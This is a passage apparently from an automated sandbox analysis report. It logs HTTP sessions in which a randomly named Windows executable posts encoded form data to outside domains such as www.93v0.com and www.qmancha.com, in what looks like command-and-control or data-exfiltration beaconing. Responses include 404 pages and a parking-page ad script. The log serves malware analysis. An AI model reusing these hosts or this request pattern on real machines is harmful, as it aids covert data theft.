                                                                            Content-Length: 223
                                                                            Origin: http://www.93v0.com
                                                                            Referer: http://www.93v0.com/hcaw/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 78 50 52 44 59 4f 59 74 6b 68 52 32 39 4c 53 67 43 48 4a 42 2f 56 53 67 4b 4f 42 55 41 32 6b 59 74 4a 53 43 68 36 65 6d 43 30 68 5a 2f 57 6c 44 42 59 6e 2f 31 50 4c 45 76 64 37 44 51 53 4a 64 32 69 37 68 69 52 50 58 6e 48 6d 77 34 73 73 77 79 69 4c 59 7a 4d 32 54 39 61 58 73 74 4a 6c 74 37 75 77 33 44 6d 4c 6b 38 7a 55 31 50 4f 2f 59 6a 36 58 53 4f 56 38 43 65 4a 75 6a 71 45 33 47 66 44 55 37 65 2f 2b 51 41 7a 4f 58 30 48 79 70 41 52 32 52 6c 46 7a 4d 6e 74 53 66 41 44 51 59 42 39 37 37 73 54 33 43 34 39 41 6e 75 41 39 69 50 38 61 4b 70 4e 77 55 4c 70 4c 68 6c 4f 6d 72 73 5a 64 4c 49 31 41 4a 67 61 67 3d
                                                                            Data Ascii: tF1tk6=aYRfiZpqinkBxPRDYOYtkhR29LSgCHJB/VSgKOBUA2kYtJSCh6emC0hZ/WlDBYn/1PLEvd7DQSJd2i7hiRPXnHmw4sswyiLYzM2T9aXstJlt7uw3DmLk8zU1PO/Yj6XSOV8CeJujqE3GfDU7e/+QAzOX0HypAR2RlFzMntSfADQYB977sT3C49AnuA9iP8aKpNwULpLhlOmrsZdLI1AJgag=
                                                                            Jun 19, 2024 22:41:35.131256104 CEST367INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:35 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            43192.168.2.449787202.95.21.152801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:35.274821997 CEST10876OUTPOST /3in6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Content-Length: 10304
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.qmancha.com
                                                                            Referer: http://www.qmancha.com/3in6/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Raw: 67 68 65 50 31 44 58 3d 4d 63 41 59 47 4a 45 59 6a 78 5a 6d 58 31 54 67 5a 48 33 78 71 55 45 6b 7a 48 42 55 31 2b 6b 4c 54 50 44 51 56 5a 6d 57 77 74 67 47 54 76 52 63 48 47 59 56 74 6c 51 59 49 47 71 71 38 46 49 52 39 4c 77 7a 61 63 51 54 6f 48 55 53 79 2b 4a 43 5a 4f 48 4d 59 49 55 4f 69 72 71 30 33 51 61 69 39 67 69 33 6d 35 50 62 49 41 44 70 41 32 6c 58 35 70 5a 75 67 61 52 30 42 7a 6c 73 38 52 4e 4c 32 77 2f 58 36 4c 58 75 59 61 6e 57 72 2f 70 51 38 76 63 4d 62 70 57 6a 73 76 46 32 63 52 48 64 73 58 39 34 4b 72 71 76 6a 77 4a 62 58 72 78 34 56 4f 38 34 4e 38 4c 45 43 41 42 54 7a 33 74 69 4e 5a 73 4d 51 78 66 71 68 46 37 64 75 41 30 55 48 30 76 35 32 78 61 6c 49 48 59 34 45 64 56 64 45 63 50 56 55 41 59 35 58 37 6e 71 61 48 54 76 64 4a 6c 72 36 55 70 57 35 2b 44 70 41 69 52 37 77 46 39 66 53 52 59 47 35 6a 57 74 65 47 4b 7a 4e 6b 73 37 55 51 53 71 75 75 4e 47 71 71 6a 67 59 64 6e 74 33 6a 41 2f 52 57 45 41 38 41 32 62 7a 6c 2b 31 6c 6d 59 6e 74 6c 74 6b 55 54 77 69 41 42 59 38 6b 4d 74 72 4d 68 [TRUNCATED]
                                                                            Data Ascii: gheP1DX=McAYGJEYjxZmX1TgZH3xqUEkzHBU1+kLTPDQVZmWwtgGTvRcHGYVtlQYIGqq8FIR9LwzacQToHUSy+JCZOHMYIUOirq03Qai9gi3m5PbIADpA2lX5pZugaR0Bzls8RNL2w/X6LXuYanWr/pQ8vcMbpWjsvF2cRHdsX94KrqvjwJbXrx4VO84N8LECABTz3tiNZsMQxfqhF7duA0UH0v52xalIHY4EdVdEcPVUAY5X7nqaHTvdJlr6UpW5+DpAiR7wF9fSRYG5jWteGKzNks7UQSquuNGqqjgYdnt3jA/RWEA8A2bzl+1lmYntltkUTwiABY8kMtrMhNq2qOqHT7N+R6E1Yr8zyykgO6sc1u8C6HEhmepAGzI53GWS0lAurCTpP7ta6fpju11vFEWe33Uihpg0dPFHUt23GtEZ9xycIPFgbocVbhG4rU+VDf1h5FJqkkIhOybX6aZTwy6tp6IdUr5HjVPbDR2ox+ZFElVHJcIm8am4fpJjpvVft1vY6l7RPLoZUjpCXn6Ohh9R3mSIuNmF3sDLYrF5a8zi0CkDkiDpWHvlSAbc2k9yleB9mDw0HFwgzj+rN2JpyBXf/EYa2W7ztvTbFRo4SE7ejpSD+7RutRtjtm8W28RuerrZUiRaojjKoCv+j0+8mff02UcbK2uKNoYwxrYPBJVc/EjHpU88PUnSBBB9RbzsXWNtD9LJliNmowln8gUrbi6sCP2m/6RF0Mns9RCibO1k0Jf/bTTGIluBgV0V+4zgX1baj0xkUpcZzmuzGX2a3GmFCs2IqbqtyBel3prGguApn6gn2rnrTFsZFlUAFNw0fe5LYLJ5kryjptBcwOg28jc2FTPnQNT7+E3sQs2WK/o6dNB1SgV//D1XtAnfwd43nFsXJ7dypItL547F+QGwrkNhbY7NR88hrTTpN3pJ/+wPVBeZeQS8lVvA5K/jkCQ6r0B8pxR8+5YBh8drg8WlBycSvi7/5pKKCIzFXQrZkBcF+IKLgLT [TRUNCATED]
                                                                            Jun 19, 2024 22:41:36.278764963 CEST190INHTTP/1.1 400 Bad Request
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:36 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: d404 Not Found0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            44192.168.2.44978818.178.206.118805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:36.858357906 CEST10780OUTPOST /hcaw/ HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.93v0.com
                                                                            Referer: http://www.93v0.com/hcaw/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 78 50 52 44 59 4f 59 74 6b 68 52 32 39 4c 53 67 43 48 4a 42 2f 56 53 67 4b 4f 42 55 41 32 73 59 74 37 71 43 68 5a 6d 6d 59 30 68 5a 6a 47 6c 47 42 59 6e 69 31 50 44 49 76 59 6a 54 51 51 78 64 30 48 33 68 79 30 37 58 75 48 6d 77 6c 38 73 39 74 79 4b 46 7a 4e 48 62 39 5a 2f 73 74 4a 6c 74 37 74 34 33 58 44 2f 6b 76 6a 55 36 5a 2b 2b 5a 6f 61 58 32 4f 56 6b 53 65 4a 69 7a 71 56 58 47 66 6a 45 37 5a 4e 6d 51 49 7a 4f 56 6b 58 79 50 41 52 37 50 6c 46 2f 41 6e 74 57 6c 41 42 4d 59 4d 37 53 35 33 54 4c 49 69 4e 41 57 7a 51 4a 42 4c 62 32 63 76 38 34 74 62 72 72 56 77 2f 57 56 73 62 77 4f 61 47 4d 52 36 63 53 5a 4a 42 6f 39 6f 49 52 71 6e 69 36 77 69 63 38 56 68 61 6a 48 69 6c 31 69 5a 6a 74 66 6c 71 30 4d 54 79 62 4a 53 78 51 32 54 30 58 6a 77 6c 65 5a 55 62 69 35 72 49 48 30 38 59 32 57 77 69 32 65 58 67 55 6e 44 76 72 52 70 62 6a 61 79 78 50 77 47 76 62 49 72 51 41 31 48 45 47 65 50 46 36 4c 52 73 58 58 7a 59 63 6c 7a 63 66 30 51 4b 2f 65 34 36 38 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=aYRfiZpqinkBxPRDYOYtkhR29LSgCHJB/VSgKOBUA2sYt7qChZmmY0hZjGlGBYni1PDIvYjTQQxd0H3hy07XuHmwl8s9tyKFzNHb9Z/stJlt7t43XD/kvjU6Z++ZoaX2OVkSeJizqVXGfjE7ZNmQIzOVkXyPAR7PlF/AntWlABMYM7S53TLIiNAWzQJBLb2cv84tbrrVw/WVsbwOaGMR6cSZJBo9oIRqni6wic8VhajHil1iZjtflq0MTybJSxQ2T0XjwleZUbi5rIH08Y2Wwi2eXgUnDvrRpbjayxPwGvbIrQA1HEGePF6LRsXXzYclzcf0QK/e468FlUN21B6tXY1Gk+b8mOi0DfqXucAk1hN46rYP7UB5Y6w5K/isa3vMduTGYLmkxXDdy1BD38BCgV+9HbCiqJLj91oUmo0JNRcANur/AtvjqO9BM2vZEOCZ5Bwd2DhzK7dSiifF9d8mpnlxOwG/R2wP4ohs1NB4+iufCUBEEGBIo2w5RZsDDs9KF6m5BkVERtOyE7EugCWnBiEqcxKWBcOXnZxbonBtTKwKJP3qdJTRiSQML/p9WA9RIJqRY8zg6QeaeZke1lNmVSh9eyqcBR+jxTIUytkPBHJQyX3JqxJ+h/eoXFjUBkWrVw/+T7crcI2fhrLKJ/KO9fmi/Q8DcZCd4H5U3H51UtmygcnpQP94VMBpeHFoDeJMgblf46w2jeOSil4ssNFgtjtSmcUFwmi9n9Oh+RpGuO7Fno0gz5pOvn6cfiWiYeAJ9pPoKgN91AR9GO4n9kIbAMVzH0zwOR7fEJDjih1jQ0uuUDllS3iZr4OEz0fmVEsd7a3ah0T6abC+fKm0qdEQhx60hzOwR8hCdZ2KL66JM+9693jnd6mJqdOtblFXcDByuyjJg8x3S7iHHx2xHoxl/QlNqgWEgugKumEzVodsU8VemHXmo+P0ceNAjKAR47aj9KNdR2CrWzvEtaPrTEK9utV7ND1J4K3Oz1vhtnFI1xsnX [TRUNCATED]
                                                                            Jun 19, 2024 22:41:37.651166916 CEST367INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:37 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            45192.168.2.449789202.95.21.152801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:37.810060024 CEST513OUTGET /3in6/?gheP1DX=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&QTth=cdSXMBmhjDz HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Jun 19, 2024 22:41:38.812927008 CEST193INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:38 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            46192.168.2.44979018.178.206.118805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:39.388326883 CEST427OUTGET /hcaw/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=Xa5/huFy8Eck4v8fb+wyxg1DlrWOKGB/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNoV7by9A8iCGRjPSG14/ArJMw+NsbE1irimM= HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:40.164597034 CEST367INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:40 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            47192.168.2.44979166.96.162.149805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:45.471657991 CEST702OUTPOST /mjuo/ HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.leadchanges.info
                                                                            Referer: http://www.leadchanges.info/mjuo/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 72 6c 54 61 72 49 45 49 75 2f 71 7a 43 66 35 52 4f 67 54 44 61 64 35 65 4c 4c 48 4a 6f 33 65 4f 49 36 68 47 41 2b 6d 30 37 6f 48 53 2b 78 42 31 2f 73 77 70 7a 49 65 76 61 30 38 66 4b 41 42 74 47 72 63 66 33 2f 61 54 75 35 34 6c 47 39 57 35 6d 37 47 52 7a 38 44 4b 6d 57 6f 59 5a 4f 68 44 6a 46 37 2b 78 58 4a 37 5a 58 48 46 37 54 79 34 54 32 71 71 69 7a 6c 62 42 6e 4e 4d 4c 5a 53 75 39 48 50 52 57 67 47 70 6b 45 6e 73 49 45 61 65 6a 67 31 34 31 4d 35 7a 55 7a 46 5a 6d 2f 71 62 4b 6b 68 45 62 4a 68 4f 6e 50 44 61 56 49 78 5a 52 35 6e 54 59 77 3d 3d
                                                                            Data Ascii: tF1tk6=LWibrjoHVkt6rlTarIEIu/qzCf5ROgTDad5eLLHJo3eOI6hGA+m07oHS+xB1/swpzIeva08fKABtGrcf3/aTu54lG9W5m7GRz8DKmWoYZOhDjF7+xXJ7ZXHF7Ty4T2qqizlbBnNMLZSu9HPRWgGpkEnsIEaejg141M5zUzFZm/qbKkhEbJhOnPDaVIxZR5nTYw==
                                                                            Jun 19, 2024 22:41:45.979161024 CEST1087INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:45 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 0
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            48192.168.2.44979266.96.162.149805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:48.016074896 CEST722OUTPOST /mjuo/ HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.leadchanges.info
                                                                            Referer: http://www.leadchanges.info/mjuo/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 4c 57 69 62 72 6a 6f 48 56 6b 74 36 35 30 6a 61 6e 4c 73 49 35 50 71 79 50 50 35 52 42 41 54 48 61 64 31 65 4c 4b 43 4d 76 43 75 4f 49 62 39 47 48 38 65 30 36 6f 48 53 31 52 42 77 78 4d 77 2b 7a 49 61 52 61 31 77 66 4b 41 56 74 47 76 51 66 33 4d 79 51 76 70 34 6a 4b 64 58 2f 34 4c 47 52 7a 38 44 4b 6d 57 4e 39 5a 4f 35 44 6a 56 4c 2b 6a 69 6b 74 61 58 48 43 79 7a 79 34 5a 57 71 75 69 7a 6c 6c 42 6a 74 32 4c 61 6d 75 39 46 58 52 57 78 47 32 72 45 6d 6e 4d 45 62 57 79 7a 6f 61 78 4f 59 64 55 77 78 69 6f 4f 65 50 4c 69 77 65 4b 34 41 5a 31 50 6e 70 49 50 34 74 63 36 61 61 44 39 45 4c 53 45 6a 43 61 32 56 50 66 75 68 5a 52 32 41 74 39 72 67 3d
                                                                            Data Ascii: tF1tk6=LWibrjoHVkt650janLsI5PqyPP5RBATHad1eLKCMvCuOIb9GH8e06oHS1RBwxMw+zIaRa1wfKAVtGvQf3MyQvp4jKdX/4LGRz8DKmWN9ZO5DjVL+jiktaXHCyzy4ZWquizllBjt2Lamu9FXRWxG2rEmnMEbWyzoaxOYdUwxioOePLiweK4AZ1PnpIP4tc6aaD9ELSEjCa2VPfuhZR2At9rg=
                                                                            Jun 19, 2024 22:41:48.510469913 CEST1087INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:48 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 867
                                                                            Connection: close
                                                                            Server: Apache
                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                            Accept-Ranges: bytes
                                                                            Age: 0
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            49192.168.2.44979366.96.162.149805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:50.549124002 CEST10804OUTPOST /mjuo/ HTTP/1.1
                                                                            Host: www.leadchanges.info
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.leadchanges.info
                                                                            Referer: http://www.leadchanges.info/mjuo/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
